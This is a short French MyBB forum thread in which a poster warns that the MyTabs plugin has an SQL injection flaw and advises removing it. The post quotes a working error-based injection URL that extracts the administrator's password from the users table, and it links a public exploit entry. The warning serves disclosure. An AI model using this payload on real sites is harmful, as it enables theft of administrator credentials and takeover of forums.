MyTabs SQL Vulnerabilty - Version imprimable

MyTabs SQL Vulnerabilty - Version imprimable

+- MyBB.support, le portail francophone de MyBB (http://mybb.fr)
+-- Forum : MyBB.fr (http://mybb.fr/forum-1.html)
+--- Forum : Annonces (http://mybb.fr/forum-47.html)
+--- Sujet : MyTabs SQL Vulnerabilty (/thread-4588.html)

MyTabs SQL Vulnerabilty - dipsiii - 10-08-2011

Attention,

Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.

La seul solution est de supprimer le plugin.

Code :

http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

http://www.exploit-db.com/exploits/17595/

RE: MyTabs SQL Vulnerabilty - valix - 11-08-2011

Ouai j'avais dit a exdiogene et sa spyto , mais vu qu'il mon pas répondu ^^

Utilitaire de traduction fourni par Regentronique